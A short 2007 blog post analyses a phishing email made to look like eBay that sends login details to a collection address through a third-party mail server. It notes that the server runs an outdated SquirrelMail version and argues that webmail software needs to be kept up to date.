Thursday, 24 May 2007

Another mailto eBay phish

Here's a genuine looking eBay phishing attempt that came in today. As you can see all the links point back to the genuine eBay site:















It's only when you view the source code that you notice that something doesn't seem right with this email. You can see that if you did try and login to eBay directly from this email, your eBay login details would be kindly sent to seflab...@yahoo.com via the mailto server mailhost.dglnet.com.br:




So, lets take a look at mailhost.dglnet.com.br. Well, looks like they are running squirrelmail but let's checkout the version number.... hmmm... v1.4.4:









Let's go to the main squirrelmail site and see what version is the current one. Well, the latest one is:

SquirrelMail 1.4.10a Released
May 09, 2007 by Thijs Kinkhorst

The SquirrelMail Project Team is proud to announce the release of SquirrelMail 1.4.10a.

The 1.4.10 release contains multiple fixes for cross site scripting issues triggered by viewing HTML mail. Besides that it contains bug fixes and stability enhancements


The version before that looks something like this changelog wise:













Are the any problems with running older versions... yep... just a few!

So, looks like keeping webmail software up to date is a must.

No comments: